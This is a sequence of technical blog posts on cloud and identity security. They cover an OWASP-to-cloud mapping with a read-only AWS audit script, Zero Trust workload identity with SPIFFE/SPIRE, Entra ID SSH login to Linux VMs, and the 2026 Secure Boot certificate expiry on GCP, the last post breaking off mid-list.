A01	Broken Access Control	EP04: Broken access control in AWS
A02	Cryptographic Failures	EP06 (partial): CI/CD secrets exposure
A03	Injection	EP07: SSRF to cloud metadata
A04	Insecure Design	EP08: Kubernetes container escape
A05	Security Misconfiguration	EP08: Kubernetes container escape
A06	Vulnerable Components	EP09: Supply chain attacks
A07	Authentication Failures	EP05: MFA fatigue attacks
A08	SW/Data Integrity	EP06: CI/CD secrets exposure, EP09: Supply chain
A09	Logging/Monitoring Failures	EP11: Detection engineering with eBPF
A10	SSRF	EP07: SSRF to cloud metadata

Run This in Your Own Environment: OWASP Coverage Self-Assessment

Run this against your AWS account and record the results as your OWASP A01–A10 baseline before the EP04 exercise:

#!/bin/bash
# Purple Team EP02 — OWASP Cloud Coverage Check
# Run in an account with read-only IAM permissions

echo "=== A01: Broken Access Control ==="
echo "--- S3 public access block status ---"
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) 2>/dev/null || \
  echo "WARN: Account-level public access block not set"

echo ""
echo "=== A02: Cryptographic Failures ==="
echo "--- EBS default encryption ---"
aws ec2 get-ebs-encryption-by-default --query 'EbsEncryptionByDefault' --output text

echo ""
echo "=== A05: Security Misconfiguration ==="
echo "--- GuardDuty status in current region ---"
aws guardduty list-detectors --query 'DetectorIds' --output text || echo "DISABLED"

echo ""
echo "=== A07: Authentication Failures ==="
echo "--- IAM users without MFA ---"
aws iam generate-credential-report 2>/dev/null
sleep 3
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "NO MFA: "$1}'

echo ""
echo "=== A09: Logging/Monitoring Failures ==="
echo "--- CloudTrail multi-region trail ---"
aws cloudtrail describe-trails --query 'trailList[?IsMultiRegionTrail==`true`].Name' --output text || \
  echo "WARN: No multi-region trail"

echo ""
echo "=== A10: SSRF ==="
echo "--- EC2 instances with IMDSv1 enabled ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,IMDS:MetadataOptions.HttpTokens}' \
  --output table

⚠ Common Mistakes When Mapping OWASP to Infrastructure

Treating it as a checklist, not a threat model. OWASP categories are not yes/no checkboxes. “Is broken access control present?” is not a question with a binary answer. The question is: which resources are accessible to which principals, and is that access correct given the intended design?

Ignoring A09 (Logging/Monitoring) until the breach. The first nine categories are about preventing or limiting the attack. A09 is about knowing it happened. Without A09 controls, you will not know you were breached until a third party tells you.

Fixing web-layer controls and ignoring the infrastructure equivalents. An organization that scores well on OWASP in their web application pen test may still have public S3 buckets, IMDSv1 enabled everywhere, and no CloudTrail in us-west-1. The mapping in this episode applies to infrastructure — run it separately from your application security assessments.

Conflating A06 (Vulnerable Components) with just “patch management.” XZ Utils was fully patched in the affected timeframe — the malicious version was the latest release. A06 in the supply chain context is about verifying the integrity of what you install, not just its version number.

Quick Reference

OWASP	Cloud Infrastructure Equivalent	Detection Tool
A01	IAM wildcards, public S3, broad trust policies	AWS Config, CloudTrail
A02	Plaintext secrets in env vars, unencrypted S3	TruffleHog, Macie
A03	SSRF, Log4j JNDI injection	WAF logs, CloudTrail IMDS calls
A04	Privileged containers, no seccomp	OPA/Gatekeeper, Falco
A05	K8s RBAC defaults, open etcd, open SGs	kube-bench, AWS Config
A06	Unpatched base images, transitive CVEs, supply chain	Trivy, Grype, SLSA
A07	MFA fatigue, long-lived sessions, stolen tokens	GuardDuty, Okta logs
A08	Unsigned images, mutable CI references, build compromise	Cosign, SLSA, OIDC
A09	No CloudTrail, no GuardDuty, no runtime telemetry	AWS Security Hub
A10	IMDSv1 on EC2, SSRF to internal endpoints	VPC Flow Logs, CloudTrail

Key Takeaways

OWASP Top 10 is a threat taxonomy — every category has a cloud, Kubernetes, or Linux infrastructure equivalent
A01 (Broken Access Control) is the most common cloud failure: IAM wildcards, public S3, and overly broad trust policies
A10 (SSRF) is what enabled the Capital One breach — IMDSv1 on EC2 makes any SSRF a credential theft path
A08 (Software/Data Integrity) is the SolarWinds attack class — supply chain compromise of the build pipeline itself
A09 (Logging/Monitoring) is the category that turns the other nine from “detectable breach” into “11-day dwell time”
Fixing A01–A08 without A09 means you improve your controls but still won’t know when they’re bypassed
Run the OWASP coverage self-assessment above and record your baseline before starting the episode exercises

What’s Next

EP03 is the breach landscape: six major incidents from December 2020 (SolarWinds) through April 2024 (XZ Utils). Each one maps to the OWASP categories from this episode. The pattern across all six is three root causes — identity, supply chain, misconfiguration — and understanding that pattern tells you where to spend your next purple team exercise. The cloud security breaches from 2020 to 2025 are the empirical record this series is built on.

Get EP03 in your inbox when it publishes → subscribe at linuxcent.com

Zero Trust Identity: SPIFFE, SPIRE, mTLS, and Continuous Verification

May 10, 2026May 9, 2026 by Vamshi Krishna Santhapuri

Reading Time: 7 minutes

The Identity Stack, Episode 13
EP12: Entra ID + Linux → EP13

TL;DR

Zero Trust means “never trust, always verify” — identity is verified continuously, not just at login time; network location provides no implicit trust
Human identity (users) and workload identity (services, pods, jobs) are separate problems — LDAP/Kerberos/OIDC solve the human side; SPIFFE/SPIRE solve the workload side
SPIFFE (Secure Production Identity Framework For Everyone) defines a standard for workload identity — a SPIFFE ID is a URI like spiffe://corp.com/ns/prod/sa/payments-svc
SPIRE (SPIFFE Runtime Environment) issues short-lived X.509 SVIDs (SPIFFE Verifiable Identity Documents) to workloads — certificates that rotate automatically, every hour
mTLS (mutual TLS) is how workloads prove identity to each other — both sides present certificates; no passwords, no API keys
The evolution: /etc/passwd (1970) → NIS → LDAP → Kerberos → SAML → OIDC → SPIFFE/SPIRE — the problem has always been the same; the trust boundary keeps moving outward

The Big Picture: From /etc/passwd to Zero Trust

1970s  /etc/passwd              ← trust: the local machine
       One machine, one user list

1984   NIS / Yellow Pages       ← trust: the local network
       Centralized, but cleartext, flat

1993   LDAP                     ← trust: the directory server
       Hierarchical, scalable, encrypted (eventually)

1988   Kerberos                 ← trust: the KDC
       Tickets instead of passwords, network-wide

2002   SAML                     ← trust: the IdP assertion
       Identity crosses the internet

2014   OIDC / OAuth2            ← trust: the JWT signature
       API-native, mobile-native, developer-native

2017   SPIFFE / SPIRE           ← trust: the workload certificate
       Automated identity for services, not humans

2026   Zero Trust               ← trust: nothing, verify everything
       Continuous verification, short-lived credentials,
       device posture, behavioral signals

EP01 of this series started with the chaos of per-machine /etc/passwd. This episode — EP13 — closes the loop: from that chaos to a model where identity is verified continuously, credentials expire in hours not years, and the network provides no implicit trust.

The Assumption That Zero Trust Rejects

Traditional security assumed: if you’re on the internal network, you’re trusted. A VPN user was treated as equivalent to someone at a desk in the office. A service running on the same Kubernetes node as another service was implicitly trusted.

That assumption broke in practice:

Compromised VPN credentials gave attackers full internal access
Lateral movement after initial compromise was easy — once inside, everything trusted you
Perimeter-based security had no visibility into east-west traffic (service-to-service)

Zero Trust inverts the model: the network provides no trust. Every access request is verified — user or service, internal or external, first request or hundredth. Trust is dynamic, contextual, and short-lived.

Human Zero Trust: Continuous Verification

For human users, Zero Trust extends OIDC and Conditional Access:

Short-lived tokens. Access tokens expire in 1 hour (OIDC standard). Refresh tokens are revocable. A user who is terminated can have their refresh tokens revoked in Entra ID — the next time their app tries to use the refresh token, it fails. The maximum blast radius of a stolen token is bounded by its lifetime.

Device posture. The device the user authenticates from is part of the identity assertion. Conditional Access can require: device is managed (Intune-enrolled), device is compliant (no malware, full-disk encryption enabled, OS patched). A valid user credential from an unmanaged device is denied.

Behavioral signals. Entra ID Identity Protection and similar systems analyze login patterns — unusual location, impossible travel (login from Mumbai, then New York 5 minutes later), unfamiliar device. High-risk sign-ins trigger step-up authentication or are blocked automatically.

Privileged Access Management (PAM). For privileged operations (production shell access, AD admin), Zero Trust adds time-bounded just-in-time access:

Request:  "I need admin access to db01.corp.com for 2 hours to investigate an incident"
Approval: Manager approves via Slack/email/ticketing system
Grant:    Temporary role assignment or password checkout from the PAM vault
Access:   User SSHes with a one-time or time-limited credential
Expire:   Credential automatically revoked after 2 hours
Audit:    Full session recording available for review

CyberArk, BeyondTrust, and HashiCorp Vault implement this model. Vault’s SSH Secrets Engine issues short-lived SSH certificates:

# Request a signed SSH certificate (valid 30 minutes)
vault ssh \
  -role=prod-admin \
  -mode=ca \
  -mount-point=ssh-client-signer \
  [email protected]

# Vault issues a certificate signed by the server's trusted CA
# sshd on db01 trusts that CA — no authorized_keys needed
# Certificate expires in 30 minutes — no cleanup required

Workload Identity: The Non-Human Problem

Services don’t have passwords they can type. A microservice calling another microservice needs to prove its identity — but you can’t give a Kubernetes pod a static API key (it’ll be in a config file, in a git repo, or in a crash dump within 6 months).

Workload identity solves this with short-lived, automatically rotated certificates — the service’s identity is its certificate, issued by a trusted CA, expiring in minutes to hours.

Traditional:                     Zero Trust:
  payments-svc → orders-svc        payments-svc → orders-svc
  Authentication: API key           Authentication: mTLS (X.509 cert)
  "Bearer sk_live_abc123"           cert: spiffe://corp.com/ns/prod/sa/payments-svc
  Rotation: manual (rarely done)    Rotation: automatic, every hour
  Revocation: change the key        Revocation: cert expires; new cert issued
  Audit: "API key was used"         Audit: "spiffe://payments-svc → spiffe://orders-svc"

SPIFFE: The Standard

SPIFFE (Secure Production Identity Framework For Everyone) defines what a workload identity looks like. The core concept is the SPIFFE ID — a URI in the format:

spiffe://<trust-domain>/<workload-path>

Examples:
  spiffe://corp.com/ns/prod/sa/payments-svc
  spiffe://corp.com/region/us-east/service/auth-api
  spiffe://corp.com/k8s/cluster-prod/namespace/payments/pod/payments-svc-abc123

The trust domain (corp.com) is the organizational boundary. The path is the workload identifier — typically encoding namespace, service account, or cluster information.

A SPIFFE ID is embedded in an SVID (SPIFFE Verifiable Identity Document) — either an X.509 certificate (X.509-SVID) or a JWT (JWT-SVID). The X.509-SVID is the standard form: the SPIFFE ID appears in the certificate’s Subject Alternative Name (SAN) field.

X.509 Certificate (SVID):
  Subject: CN=payments-svc
  SAN: URI=spiffe://corp.com/ns/prod/sa/payments-svc
  Validity: 1 hour
  Issuer: SPIRE Intermediate CA
  Signed by: corp.com trust bundle

Any service that has the corp.com trust bundle (the CA certificate chain) can verify that a certificate with spiffe://corp.com/... in the SAN was issued by the authorized CA for that trust domain.

SPIRE: The Runtime

SPIRE (SPIFFE Runtime Environment) is the reference implementation that issues SVIDs to workloads.

SPIRE Server
  ├── Node attestation: verifies the identity of the node/VM
  │   (AWS instance identity document, GCP service account, k8s node SA)
  └── Workload attestation: verifies the identity of the process
      (Kubernetes SA, Unix UID/GID, Docker container labels)
         │
         │ issues X.509 SVIDs (short-lived, auto-rotated)
         ▼
SPIRE Agent (runs on every node)
         │
         │ SPIFFE Workload API (Unix socket)
         ▼
Workload (your service)
  → gets its own certificate
  → gets the trust bundle (CA certs of trusted domains)
  → uses cert for mTLS with other services

The workload fetches its identity via the Workload API socket — no environment variables, no file mounts. The SPIRE Agent pushes new certificates before the old ones expire. Rotation is transparent to the workload.

# On a node with SPIRE Agent running:
# Fetch the SVID for the current workload
spire-agent api fetch x509 \
  -socketPath /run/spire/sockets/agent.sock

# Output shows:
# SPIFFE ID: spiffe://corp.com/ns/prod/sa/payments-svc
# Certificate: (PEM)
# Trust bundle: (PEM of issuing CA chain)
# Expires: 2026-04-27T02:00:00Z (1 hour from now)

mTLS: Both Sides Show ID

Mutual TLS (mTLS) is what makes SPIFFE useful operationally. In standard TLS, only the server presents a certificate — the client just verifies it. In mTLS, both sides present certificates. Both sides verify the other’s certificate against the trust bundle.

payments-svc → orders-svc connection:

TLS handshake:
  payments-svc presents: spiffe://corp.com/ns/prod/sa/payments-svc cert
  orders-svc presents:   spiffe://corp.com/ns/prod/sa/orders-svc cert

  Both verify:
    • cert signed by trusted CA (the corp.com SPIRE CA)
    • cert not expired
    • SPIFFE ID in SAN matches what's expected

  After handshake: encrypted channel, both sides verified
  Authorization: orders-svc checks its policy:
    "is spiffe://corp.com/ns/prod/sa/payments-svc allowed to call /api/orders?"

Service meshes (Istio, Linkerd, Consul Connect) implement mTLS transparently — the application doesn’t handle certificates; the sidecar proxy does. In Istio’s case, Citadel (now istiod) acts as the SPIFFE-compatible CA, issuing certificates to envoy sidecars. The application code doesn’t change.

Open Policy Agent: Authorization After Identity

Zero Trust separates identity from authorization. Once you know who the caller is (SPIFFE ID, OIDC token, user cert), a policy engine decides what they can do.

OPA (Open Policy Agent) is the standard for this:

# opa-policy.rego
package authz

# payments-svc can read orders; nothing else can write orders
allow {
  input.caller == "spiffe://corp.com/ns/prod/sa/payments-svc"
  input.method == "GET"
  startswith(input.path, "/api/orders")
}

default allow = false

The service checks OPA on each request: “caller=X wants to do Y to Z — allowed?” OPA evaluates the policy and returns a decision. The policy is version-controlled, tested, and deployed independently of the service.

⚠ Common Misconceptions

“Zero Trust means no trust.” Zero Trust means trust is earned dynamically through verification, not granted by network location. A verified user with a valid, compliant device and MFA is trusted — for the scope and duration of the verified session. The “zero” refers to implicit trust, not trust itself.

“SPIFFE replaces OIDC.” SPIFFE is for workload (service) identity. OIDC is for human (user) identity. They complement each other — a service has a SPIFFE identity; a user has an OIDC identity; the authorization layer accepts both.

“mTLS is complex to implement.” With a service mesh (Istio, Linkerd), mTLS is transparent — the sidecar handles it. Without a service mesh, the application needs to use the SPIFFE Workload API. The complexity is real but manageable, especially compared to the alternative of static API keys.

Framework Alignment

Domain	Relevance
CISSP Domain 5: Identity and Access Management	Zero Trust extends IAM to workloads (SPIFFE) and continuous verification (short-lived tokens, device posture) — it’s the current frontier of identity architecture
CISSP Domain 3: Security Architecture and Engineering	The separation of identity (SPIFFE ID), authentication (mTLS), and authorization (OPA) is a clean architectural decomposition that scales to complex multi-service environments
CISSP Domain 4: Communications and Network Security	mTLS encrypts and authenticates every service-to-service connection — it eliminates the assumption that east-west traffic on the internal network is safe
CISSP Domain 1: Security and Risk Management	Zero Trust is a risk management posture — it accepts that perimeter breach is inevitable and limits blast radius through continuous verification and least-privilege

Key Takeaways

Zero Trust rejects network-based implicit trust — every request is verified regardless of source
Human identity: short-lived OIDC tokens, device posture checks, Conditional Access, JIT privileged access (Vault, CyberArk)
Workload identity: SPIFFE IDs in X.509 certificates, issued by SPIRE, rotated automatically every hour — no static API keys
mTLS lets services verify each other’s identity at the TLS layer — service meshes (Istio, Linkerd) implement it transparently
OPA handles authorization after identity is established — who you are ≠ what you can do
The series arc: /etc/passwd → NIS → LDAP → Kerberos → SAML → OIDC → SPIFFE/SPIRE — the problem has always been “how do you know who someone is, at scale, without trusting the network?” The answer keeps getting better.

What does identity look like at your organization — still static API keys and shared service accounts, or moving toward SPIFFE and short-lived credentials? 👇

The Identity Stack: From LDAP to Zero Trust — 13 episodes complete.

Start from EP01: What Is LDAP →

Entra ID Linux Login: SSH Authentication with Azure AD Credentials

May 10, 2026May 9, 2026 by Vamshi Krishna Santhapuri

Reading Time: 6 minutes

The Identity Stack, Episode 12
EP11: Identity Providers → EP12 → EP13: Zero Trust Identity → …

TL;DR

Entra ID (Azure AD) Linux login lets you SSH into a VM using your Azure AD credentials — no local Linux accounts, no SSH keys to distribute
The stack: aad-auth package + pam_aad.so + SSSD — Azure authenticates via OIDC device code flow or password, then maps the identity to a local Linux UID
Entra ID is not AD — it’s OIDC/OAuth2 native, with no LDAP and no Kerberos (unless you add Azure AD DS, a separate managed service)
Conditional Access Policies can gate Linux logins — MFA, device compliance, location restrictions — the same policies as for web apps
Two login modes: interactive (browser-based device code, for non-Azure VMs) and integrated (Azure IMDS-based, for Azure VMs)
Required roles: Virtual Machine Administrator Login or Virtual Machine User Login on the VM — IAM, not local sudoers

User: ssh [email protected]

  sshd on Linux VM
      │
      ▼
  PAM (/etc/pam.d/sshd)
      │
      ├── pam_aad.so (auth)
      │     │
      │     │  OIDC device code flow:
      │     │  "Go to microsoft.com/devicelogin and enter code ABCD-1234"
      │     │  User authenticates in browser with MFA
      │     │  Entra ID issues id_token + access_token
      │     ▼
      │   pam_aad validates token:
      │     • signature (JWKS from Entra ID)
      │     • tenant ID (iss claim)
      │     • VM resource audience (aud claim)
      │     • group membership (groups claim)
      │
      └── pam_mkhomedir (session)
            Creates /home/[email protected] on first login

  Shell session created
  whoami → vamshi_corp_com (sanitized UPN for Linux username)

EP11 mapped the IdP landscape. This episode gets specific: Entra ID and Linux. Understanding this matters because Entra ID is increasingly where enterprise identities live, and cloud VMs that SSH into with local accounts are an operational and security liability.

Entra ID vs Active Directory: What’s Different

This distinction matters before configuring anything.

	Active Directory (on-prem)	Entra ID (cloud)
Protocol	LDAP + Kerberos	OIDC + OAuth2
Directory queries	`ldapsearch`	Microsoft Graph API
Linux join	`realm join` (adcli + SSSD)	`aad-auth` package
Authentication	Kerberos tickets	JWT tokens
Group policy	GPO via Sysvol	Conditional Access + Intune
Network requirement	DC reachable on LAN/VPN	HTTPS to login.microsoftonline.com

Entra ID has no LDAP interface and no Kerberos realm. You cannot run ldapsearch against it. You cannot kinit to it. The authentication protocol is entirely OIDC/OAuth2 — the same protocol your browser uses to “Login with Microsoft.”

If you need LDAP and Kerberos from Azure, that’s Azure AD Domain Services — a separate managed service that Microsoft runs, which does speak LDAP and Kerberos. It’s not Entra ID; it’s a managed AD replica in Azure. EP12 covers the Entra ID path — the modern, protocol-native approach.

Prerequisites

# Azure side:
# 1. The VM's managed identity must be enabled (System-assigned)
# 2. Two Entra ID roles assigned on the VM resource:
#    - "Virtual Machine Administrator Login" (for sudo access)
#    - "Virtual Machine User Login" (for regular access)
# 3. Conditional Access policies that apply to the VM login scope

# VM side (Ubuntu 20.04+ / RHEL 8+):
# Install the aad-auth package (Microsoft-maintained)
curl -sSL https://packages.microsoft.com/keys/microsoft.asc \
  | gpg --dearmor -o /usr/share/keyrings/microsoft.gpg
echo "deb [signed-by=/usr/share/keyrings/microsoft.gpg] \
  https://packages.microsoft.com/ubuntu/22.04/prod jammy main" \
  > /etc/apt/sources.list.d/microsoft.list
apt-get update && apt-get install -y aad-auth

Configuration

# Configure the aad-auth package
aad-auth configure \
  --tenant-id 12345678-1234-1234-1234-123456789abc \
  --app-id 87654321-4321-4321-4321-cba987654321

# This writes /etc/aad.conf:
# [aad]
# tenant_id = 12345678-...
# app_id = 87654321-...
# version = 1

# Verify the PAM configuration was updated
grep pam_aad /etc/pam.d/common-auth
# auth [success=1 default=ignore] pam_aad.so

The aad-auth package installs pam_aad.so and configures PAM automatically. It also modifies /etc/nsswitch.conf to add aad as a source for passwd lookups — so getent passwd [email protected] works after the first login.

On an Azure VM (Integrated mode)

Azure VMs have access to the Instance Metadata Service (IMDS) at 169.254.169.254. pam_aad uses the VM’s managed identity to get a token from IMDS, which proves the VM is trusted, then validates the user’s token against the tenant.

# User SSHes with username as UPN ([email protected] or [email protected])
ssh [email protected]@vm.eastus.cloudapp.azure.com

# Or use the short form if the tenant is configured:
ssh [email protected]@vm.eastus.cloudapp.azure.com

On first connection, pam_aad initiates the device code flow:

To sign in, use a web browser to open https://microsoft.com/devicelogin
and enter the code ABCD-1234 to authenticate.

The user opens the URL in any browser (on any device), enters the code, and authenticates with their Entra ID credentials + MFA. The SSH session gets a token. Subsequent logins within the token cache TTL skip the device code step.

Username format on the Linux system

Entra ID usernames (UPNs) contain @ — not valid in Linux usernames. aad-auth sanitizes the UPN:

[email protected] → vamshi_corp_com    (default)
# or, with shorter_username enabled in /etc/aad.conf:
[email protected] → vamshi

The UID is derived from the Azure AD Object ID (a deterministic hash) — stable across logins, same UID on every VM in the tenant.

Conditional Access for Linux Logins

Conditional Access Policies in Entra ID apply to Linux VM logins the same way they apply to web app logins.

Policy: Require MFA for Linux VM Login
  Conditions:
    Cloud apps: "Azure Linux Virtual Machine Sign-In"
    Users: All users (or specific groups)
  Grant:
    Require multi-factor authentication
    Require compliant device (optional)

With this policy, every SSH login triggers MFA — regardless of whether the client machine supports it. The MFA challenge appears in the device code flow (the browser window the user opens).

You can also enforce:
– Location restrictions — only from corporate IP ranges
– Device compliance — device must be Intune-managed
– Sign-in risk — block logins flagged as risky by Entra ID Identity Protection

This is the operational shift: Linux login security is now managed in the same Conditional Access policy engine as every other Entra ID-protected resource. No more per-machine PAM configuration for MFA.

Role-Based Access: Who Can Log In

Access to the VM is controlled by Azure RBAC — not by local Linux groups or sudoers.

# Grant a user SSH access to the VM
az role assignment create \
  --assignee [email protected] \
  --role "Virtual Machine User Login" \
  --scope /subscriptions/SUB_ID/resourceGroups/RG/providers/Microsoft.Compute/virtualMachines/VM_NAME

# Grant admin (sudo) access
az role assignment create \
  --assignee [email protected] \
  --role "Virtual Machine Administrator Login" \
  --scope /subscriptions/SUB_ID/...

Virtual Machine Administrator Login maps to the sudo group on the Linux VM. Users with this role get passwordless sudo. Users with Virtual Machine User Login get a regular shell.

The mapping is enforced by pam_aad checking the groups claim in the token against the configured admin group. No /etc/sudoers.d/ files needed.

Debugging Entra ID Linux Logins

# Check aad-auth service status
systemctl status aad-auth

# View aad-auth logs
journalctl -u aad-auth -f

# Attempt a manual token validation (requires aad-auth debug mode)
aad-auth login --username [email protected]

# Check the local user cache
getent passwd vamshi_corp_com
# Returns if the user has logged in before

# Clear the local cache (forces re-authentication)
aad-auth clean-cache

# Verify Conditional Access isn't blocking (check Entra ID Sign-in logs)
# Azure Portal → Entra ID → Sign-in logs → filter by user + app "Azure Linux VM Sign-In"

The Entra ID Sign-in logs in the Azure Portal show every authentication attempt, the Conditional Access policies that evaluated, which ones passed/failed, and the exact failure reason. This is far more diagnostic than reading PAM logs.

Entra ID Connect: Bringing On-Prem Users to Entra ID

For organizations with existing on-prem AD who want to enable Entra ID Linux login:

On-prem AD users → Entra ID Connect sync → Entra ID
                                                │
                                    Linux VM login (aad-auth)

Entra ID Connect is a Windows Server application that syncs users from on-prem AD to Entra ID every 30 minutes. Users authenticate against Entra ID (which validates against AD via Password Hash Sync, Pass-Through Authentication, or Federation). The Linux VM doesn’t know or care — it sees an Entra ID token.

With Password Hash Sync: password hashes (not plaintext) are synced to Entra ID — users authenticate directly in the cloud.
With Pass-Through Authentication: Entra ID forwards authentication requests to an on-prem agent that validates against AD — no password hashes leave the datacenter.
With Federation (AD FS / Entra ID as a relying party): Entra ID delegates authentication to AD FS — the most complex, the most on-prem control.

⚠ Common Misconceptions

“Entra ID = Azure Active Directory = Active Directory.” Three different things. Active Directory: on-prem, LDAP+Kerberos. Azure AD (now Entra ID): cloud, OIDC+OAuth2. Azure AD Domain Services: managed AD replica in Azure, LDAP+Kerberos, not Entra ID.

“You need Azure AD DS to join Linux to Azure.” Azure AD DS is the managed AD service. Entra ID Linux login (via aad-auth) is entirely separate and doesn’t require AD DS. You can authenticate Linux to Entra ID directly via OIDC.

“The Linux username matches the Entra ID username.” The UPN is sanitized (@ → _) to produce a valid Linux username. The canonical identity is the UPN or the Entra Object ID. Don’t hardcode the sanitized username in scripts.

Framework Alignment

Domain	Relevance
CISSP Domain 5: Identity and Access Management	Entra ID Linux login centralizes Linux VM access in the same IAM system as all other enterprise resources — one policy engine, one audit log
CISSP Domain 3: Security Architecture and Engineering	Eliminating per-VM local accounts removes a class of credential management risk — no SSH keys to rotate, no local accounts to audit
CISSP Domain 1: Security and Risk Management	Conditional Access Policies enforcing MFA on Linux logins reduce the risk of credential-based compromise of cloud VMs

Key Takeaways

Entra ID Linux login uses OIDC device code flow — no LDAP, no Kerberos, no local Linux accounts
aad-auth package installs pam_aad.so and handles the full authentication stack: token issuance, validation, user cache, UID mapping
VM access is controlled by Azure RBAC roles (Virtual Machine Administrator Login / Virtual Machine User Login) — not by sudoers files
Conditional Access Policies apply to Linux VM logins — MFA, device compliance, and location restrictions use the same engine as every other Entra ID app
Debugging starts in Entra ID Sign-in logs (Azure Portal), not in /var/log/auth.log

What’s Next

EP12 showed how Entra ID enables Linux logins in the cloud. EP13 is the series closer: Zero Trust identity — what it means to verify identity continuously, how SPIFFE and SPIRE handle workload (non-human) identity, and where the stack goes from /etc/passwd in 1970 to a Zero Trust policy engine in 2026.

Next: Zero Trust Identity: SPIFFE, SPIRE, mTLS, and Continuous Verification

Get EP13 in your inbox when it publishes → linuxcent.com/subscribe

GCP Secure Boot Certificate Expiration 2026: What You Must Do Before June 24

May 7, 2026May 6, 2026 by Vamshi Krishna Santhapuri

Reading Time: 10 minutes

TL;DR

Three Microsoft UEFI Secure Boot certificates expire between June 24 and October 19, 2026
Any GCP Compute Engine instance with Secure Boot enabled, created before November 7, 2025, carries the old certs and is at risk
When the certs expire, instances may fail to boot after OS updates that pull in bootloaders signed only by the replacement 2023 certificates
GKE Shielded Nodes are affected too — node pools whose nodes haven’t been recreated since November 7, 2025 carry the old UEFI database
vTPM-sealed secrets, BitLocker, and Linux full disk encryption break if Secure Boot fails mid-update
Primary fix: recreate affected instances (post-Nov 7, 2025 instances include the updated UEFI DB automatically)
Emergency workaround if boot fails: temporarily disable Secure Boot, apply updates, re-enable

The Big Picture: The UEFI Secure Boot Trust Chain

  UEFI Firmware (PK — Platform Key, set by OEM/Google)
         │
         │  PK signs KEK updates
         ▼
  ┌─────────────────────────────────────────────┐
  │        KEK (Key Exchange Key Database)       │
  │  Microsoft Corporation KEK CA 2011           │ ← EXPIRING Jun 24, 2026
  │  Microsoft Corporation KEK CA 2023           │ ← Replacement (new VMs only)
  └────────────────────┬────────────────────────┘
                       │  KEK authorizes DB/DBX updates
                       ▼
  ┌─────────────────────────────────────────────┐
  │         DB (Authorized Signature Database)   │
  │  Microsoft UEFI CA 2011 ← signs Linux Shim  │ ← EXPIRING Jun 27, 2026
  │  Microsoft Windows PCA 2011 ← signs WinBoot │ ← EXPIRING Oct 19, 2026
  │  Microsoft UEFI CA 2023 ← replacement       │ ← Present on post-Nov 7 VMs
  │  Microsoft Windows PCA 2023 ← replacement   │ ← Present on post-Nov 7 VMs
  └────────┬───────────────────────┬────────────┘
           │                       │
           ▼                       ▼
   Linux Shim (shim.efi)    Windows Boot Manager
           │
           ▼
       GRUB2 / systemd-boot
           │
           ▼
       Linux Kernel

GCP Compute Engine instances with Secure Boot enabled — created before November 7, 2025 — have a UEFI signature database that includes the 2011 certificates but not the 2023 replacements. When those 2011 certificates expire, new bootloader binaries (signed exclusively by the 2023 certs) will be rejected at boot time.

What Secure Boot Actually Does — and Why Certificate Expiry Breaks Booting

Secure Boot is UEFI’s mechanism for ensuring that only cryptographically signed, trusted software runs during the boot sequence. The trust chain works like this:

Platform Key (PK): Root of trust, set by the hardware manufacturer or cloud provider. Authorizes updates to the KEK.
Key Exchange Key (KEK): Authorizes modifications to the DB and DBX (the forbidden signatures database). Microsoft holds one KEK slot; OEMs often hold another.
DB (Signature Database): Contains the public certificates used to verify bootloaders. If a bootloader binary is signed by a cert in DB, it’s allowed to run. If not, the firmware halts.
DBX (Forbidden Signatures Database): Revocation list. Bootloaders explicitly listed here are blocked even if they were once trusted.

Where expiry matters: The DB certificates don’t “enforce” anything at runtime by checking dates themselves — UEFI doesn’t do certificate revocation in real time. The problem is different and more insidious: as Linux distributions and Microsoft ship updated bootloaders, those new binaries are signed only by the 2023 replacement certificates, not the expiring 2011 ones. If your VM’s DB doesn’t contain the 2023 certs, the UEFI firmware will reject the new shim, and the system won’t boot after an OS update that upgrades the bootloader package.

On Debian/Ubuntu, shim-signed upgrades. On RHEL/CentOS Stream, shim-x64 upgrades. Either way: new binary, new signature, old DB — boot failure.

The Three Certificates Expiring in 2026

1. Microsoft Corporation KEK CA 2011 — expires June 24, 2026

Role: Authorizes updates to the DB and DBX signature databases.

When the KEK expires, firmware that enforces KEK validity may refuse to accept DB/DBX updates signed by this certificate. This means even if Google pushes an out-of-band UEFI DB update containing the 2023 certs, instances with an expired-only KEK slot may not be able to apply it cleanly.

Replacement: Microsoft Corporation KEK CA 2023

2. Microsoft Corporation UEFI CA 2011 — expires June 27, 2026

Role: Signs third-party bootloaders — specifically the Linux Shim (shim.efi).

This is the most critical cert for Linux workloads. Every major Linux distribution uses a shim bootloader as the first-stage loader in a Secure Boot chain. The shim is signed by Microsoft’s UEFI CA because Linux vendors submit their shim builds to Microsoft for signing (to ensure broad UEFI compatibility). When new shim packages are released signed only by UEFI CA 2023, any VM with only the 2011 cert in its DB will reject them.

Replacement: Microsoft UEFI CA 2023

3. Microsoft Windows Production PCA 2011 — expires October 19, 2026

Role: Signs Windows Boot Manager and other Windows boot components.

Windows instances on GCP using Secure Boot are affected by this cert. Post-expiry Windows OS updates that ship a new Boot Manager binary signed exclusively by the 2023 PCA will fail to boot on instances carrying only the 2011 cert.

Replacement: Microsoft Windows Production PCA 2023

Windows-specific signal: Event ID 1801 in the Windows System event log — “Secure Boot CA/keys need to be updated” — will appear by mid-2026 on affected instances, before actual boot failure. This is your warning window.

Why GCP Instances Are Specifically Affected

Google’s Compute Engine Shielded VMs ship with a pre-populated UEFI variable database. The content of that database is fixed at instance creation time — it’s part of the VM’s UEFI firmware image. Instances created before November 7, 2025 have a DB that contains the 2011 certs but not the 2023 replacements. Instances created on or after November 7, 2025 had the updated database backfilled.

This is not a Google-specific failure. Every cloud provider and on-premises hypervisor platform that uses Secure Boot with a pre-populated UEFI DB has the same problem. GCP is ahead of many platforms in actually documenting it.

GKE’s Shielded Nodes feature enables Secure Boot on node pool VMs. Each node is a Compute Engine instance — and all the same rules apply.

The risk: Node pools whose nodes were last provisioned before November 7, 2025 carry the old UEFI database. When containerd, the OS image, or the kernel gets updated via node auto-upgrade or manual node pool upgrade, the new node VMs will carry updated certs. But nodes that haven’t been replaced since before the cutoff are sitting on the old DB.

GKE auto-upgrade helps — but only if it’s actually running and has completed at least one full node replacement cycle since November 7, 2025.

Node pools with auto-upgrade disabled, or clusters in maintenance windows that delayed upgrades, are at risk.

The trigger scenario:
1. GKE runs a node OS update in-place on an old node (not a full node replacement)
2. The update upgrades the shim package to a version signed only by UEFI CA 2023
